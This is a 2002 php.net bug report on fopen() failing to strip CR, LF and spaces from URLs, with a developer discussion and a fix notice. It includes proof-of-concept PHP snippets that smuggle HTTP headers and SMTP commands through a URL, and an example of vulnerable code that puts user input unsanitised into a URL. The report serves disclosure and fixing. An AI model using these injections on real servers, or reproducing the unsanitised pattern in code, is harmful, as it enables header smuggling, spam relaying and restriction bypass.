php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #19160 fopen doesn't remove space, CR, LF from URL's
Submitted: 2002-08-28 18:35 UTC Modified: 2002-09-10 04:37 UTC
Votes:3
Avg. Score:3.3 ± 1.7
Reproduced:1 of 2 (50.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: ulfh at update dot uu dot se Assigned: derick (profile)
Status: Closed Package: HTTP related
PHP Version: 4.2.2 OS: Linux (Red Hat, Debian)
Private report: No CVE-ID: None
 [2002-08-28 18:35 UTC] ulfh at update dot uu dot se
As you know, you can use URL's in fopen(), file() etc when allow_url_fopen is On. Unfortunately, PHP doesn't remove spaces, tabs, CR or LF characters from the URL before constructing an HTTP query. This means that we can add arbitrary HTTP headers to the URL, like this:

<?php

$fp = fopen("http://www.site1.st/ HTTP/1.0\n".
            "Host: www.site2.st\n".
            "User-Agent: Nozilla/0.0\n".
            "Referer: http://www.metaur.nu/\n".
            "Cookie: user=ulf\n\n", "r");
fpassthru($fp);

?>

This program will display the contents of site2.st instead of site1.st, if they live on the same virtual host.

You can also use it for communication with other types of servers than HTTP servers:

<?php

$fp = fopen("http://mail.site1.st:25/ HTTP/1.0\n".
            "HELO my.own.machine\n".
            "MAIL FROM: <user@my.own.machine>\n".
            "RCPT TO: <info@site1.st>\n".
            "DATA\n".
            "From: user@my.own.machine\n".
            "To: info@site1.st\n".
            "Subject: This is..\n\n".
            "This is a URL that sends an e-mail (?).\n".
            ".\n".
            "QUIT\n\n", "r");
fpassthru($fp);

?>

Both the mail server and PHP will complain, but the mail still gets sent.

This can even lead to a security hole in a program like this:

<?php

$fp = fopen("http://www.site3.st/$path", "r");
fpassthru($fp);

?>

because it allows the user to break out of restrictions and access some other site than site3.st.

I have verified this behaviour in PHP 4.1.2, 4.2.2 and a CVS checkout from a few days ago. You fix it by removing all spaces, tabs, CR characters and LF characters from the URL's.

// Ulf Harnhammar
ulfh@update.uu.se

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-08-28 18:51 UTC] rasmus@php.net
Seems like a feature to me.  Should probably be documented if we keep it, but there are many examples of functions in PHP that you should not be sending raw user data to.  Things like exec(), include(), readfile() and fopen() in the non-URL sense all need their inputs sanitized.
 [2002-08-28 18:59 UTC] ulfh at update dot uu dot se
Well, I disagree. URL's don't have any field for setting cookies or user agents, so being able to do that from a field that claims to contain a URL is a bug in my opinion.

// Ulf Harnhammar
 [2002-08-29 01:31 UTC] derick@php.net
I disagree too, assiging to me.

Derick
 [2002-09-10 04:37 UTC] sesser@php.net
This bug has been fixed in CVS.

In case this was a PHP problem, snapshots of the sources are packaged
every three hours; this change will be in the next snapshot. You can
grab the snapshot at http://snaps.php.net/.
 
In case this was a documentation problem, the fix will show up soon at
http://www.php.net/manual/.

In case this was a PHP.net website problem, the change will show
up on the PHP.net site and on the mirror sites in short time.
 
Thank you for the report, and for helping us make PHP better.


 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Fri Dec 13 08:01:24 2019 UTC